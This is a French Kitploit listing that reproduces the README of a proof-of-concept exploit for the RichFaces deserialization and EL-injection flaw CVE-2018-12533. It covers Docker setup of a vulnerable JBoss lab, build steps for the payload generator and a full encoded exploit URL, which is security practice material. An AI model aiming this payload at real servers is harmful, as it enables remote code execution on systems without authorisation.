Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-12533 — Générateur de payload et exploit proof-of-concept pour CVE-2018-12533 (désérialisation/injection EL Richfaces) avec environnement vulnérable basé sur Docker pour s'entraîner. | Kitploit
Outils/GitHubGitHub/llamaonsecurity/cve-2018-12533
Analyse des VulnérabilitésExploitationExploitation d'Applications WebArticles et RechercheDéveloppement de Charges UtilesLabs et Pratique
GitHubllamaonsecurity/cve-2018-12533

CVE-2018-12533

Générateur de payload et exploit proof-of-concept pour CVE-2018-12533 (désérialisation/injection EL Richfaces) avec environnement vulnérable basé sur Docker pour s'entraîner.

Voir le dépôt
91139il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Générateur de payload RF-14310 / CVE-2018-12533

Basé sur les recherches de Lucifaer

Tout le crédit revient à https://github.com/Lucifaer

Références

https://access.redhat.com/security/cve/cve-2018-12533

richfaces-jboss-poc

Preuve de concept facile à déployer pour pratiquer l'exploitation de la désérialisation Richfaces 3.3.4 + injection EL, sans avoir à trop se soucier des anciennes versions de Java, etc.

Déployer jboss avec Docker

Pour vous éviter de configurer une application vulnérable, j'ai créé un Dockerfile basé sur les instructions de l'article seclist expliquant CVE-2018-14667. Exécutez simplement les commandes suivantes dans le répertoire racine du dépôt :

root@kitploit:~
docker build -t richfaces-jboss .
docker run -p 8081:8080 richfaces-jboss

Si tout fonctionne, vous pouvez accéder à l'application de test photoalbum richfaces sur http://127.0.0.1:8081/photoalbum

Compiler le POC depuis le répertoire racine du dépôt en un fat jar (facile avec docker et un pom fonctionnel)

root@kitploit:~
cd CVE-2018-12533
docker run -v ~/.m2:/root/.m2 -v $(pwd):/usr/src/app maven:3.5-jdk-8 mvn -f /usr/src/app/pom.xml clean package install

Générer l'URL du POC

root@kitploit:~
java -jar target/cve_2018_12533.jar 

Surfer vers l'URL sur le serveur jboss

modifiez la section /DATA/XXXXX pour votre payload si vous voulez faire autre chose que créer un fichier dans /tmp. Ce payload crée /tmp/hacked.txt http://127.0.0.1:8081/photoalbum/a4j/s/3_3_3.Finalorg.richfaces.renderkit.html.Paint2DResource/DATA/eAHNUk1r1UAUnfegVq2L-oEiItQo-goyKSJu6gOxFX2QWukTwbp4zEtuk2knM-nkpo0W3Qmi4satIOJKUBD9Be6k4KY!QQRxIYggLvVOUlssuDebXGbOnHPuufflVzaQW3bG2JhbGSZzIoScW9AR2AWJPMFU8StCajw1OQO5KWwIxzqpiGFSoGi!X!s4!OvF6yYb7LDtvX48YZSxHTbYmzM2FeiqBGScULWttywjTGbZjlCECYi-goAN9CKiQbYnmBdLwldCx!50fx5CHA!oReaEF9kd1igzVn9N-pWMNU6yjHwfd89KXrsOTZoZDRp5lzjhklHURFcsgb2--rb9-MmHqSZrBqSvRJ5fFin8rdtFK3VMujtzehNVHMj2186k8btgpVDylnM-XmZO!gRJ8rzQlQEFmHNQPIBYhDenABMTnZc6ItJ1740mawSskSI7VLGWPii!Bl4oMwt5Lo0m6n8xXxXxVvQf5l2UimUH6zjIxFbcG3!1waefpx9RfITbu4Hb1H1-9373--zaWYdwDo64lZjvm7xqaitfJ81U!9uBH0Pvdk85bTekoeWH7N7RFQuLBeTIY8AJl3RrdKMMjKCR0IGior70nBXuBs9nCo0yBa!C14Itj1g2z6VeMgvQ0oVSoxxKCFsemiJMRnxMMz8R4QJEHEv0Rm8zVlCfN6qca!r1-b5au!b5y-GVi1WfFF8T2b7KgzR8usCsQAKCoCENb1qrdzLLyuVn7OnIubGTYyNtLyQYwoTRSDvX!l8a98rfWVxP3w__.jsf

Ouvrir un shell dans un terminal séparé pour analyser le succès du payload

root@kitploit:~
docker ps
docker exec -it <containerid> bash
ls /tmp

En utilisant l'exploit tel quel, il créera /tmp/cve_2018_12533, vous pourrez ainsi confirmer si l'exploit a fonctionné.

Télécharger l’outil